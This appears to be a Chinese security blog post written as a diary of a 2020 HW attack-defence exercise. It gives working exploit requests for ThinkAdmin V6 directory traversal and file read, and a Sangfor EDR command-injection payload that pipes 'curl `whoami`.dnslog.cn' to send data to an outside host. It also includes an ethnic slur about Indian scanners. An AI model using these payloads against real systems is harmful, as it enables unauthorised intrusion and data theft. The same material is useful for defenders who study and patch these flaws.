HW平安夜: 09/16 风平浪静

  • A+
所属分类:安全文章

没人比我更了解攻击队,他们肯定已经写好投降书了。

HW平安夜: 09/16 风平浪静

我想给大家说个消息:“现在攻击方的分数都不低了”

当你还在创作防守日记

突然身后站着一位攻击队选手正在认真的记着桌面上的VPN登录密码....


1、ThinkAdminV6 任意文件操作
Update.php 三个函数未校验访问权限
1、目录遍历注意POST数据包rules参数值需要URL编码
POST /admin.html?s=admin/api.Update/node
rules=%5B%22.%2F%22%5D

HW平安夜: 09/16 风平浪静

2、文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。
/admin.html?s=admin/api.Update/get/encode/
34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

HW平安夜: 09/16 风平浪静


2、深信服EDR 远程命令执行

遇到这样的漏洞反手就是一个赞。

/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9

{"params": "w=123"'1234123'"|curl `whoami`.dnslog.cn"}

HW平安夜: 09/16 风平浪静


0day预警:
拓尔思TRSWAS5.0文件读取漏洞(CNVD-2020-27769)
网御星云VPN远程命令执行


2020年9月16日 星期三 阴转晴

今天夜班,凌晨2点,发现内网有流量,得到情报说有攻击队向客户内网扔了2个未知0day,客户宁静紧急关停机房,监测平台都打不开了,两眼一摸瞎。

战争已经白热化,没有监测平台,我们防守队依然在,人在客户阵地在,只要我不倒,客户就不会出局。

摸到了兜里的速效救心丸,瞬间安心多了。



HW平安夜: 09/16 风平浪静
今天未免也太平静了吧。
刚来交接班看到今天告警平台的流量只有寥寥无几。
感到非常讶异HW平安夜: 09/16 风平浪静
大多数都是印度阿三扫描的告警
其中有一条是中国浙江的IP同样也是这种数据包。
我简单分析了一下
这个恶意程序Mozi,如果被入侵成功后
迅速变成僵尸网络的一个节点,最终组建成庞大僵尸网络

很显然浙江的IP已经被控制变成了傀儡机
不断的向其他网段发起扫描

觉有意思的来了
那这次Hvv 会不会升级成一场国际网络战争呢

HW平安夜: 09/16 风平浪静

HW平安夜: 09/16 风平浪静

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: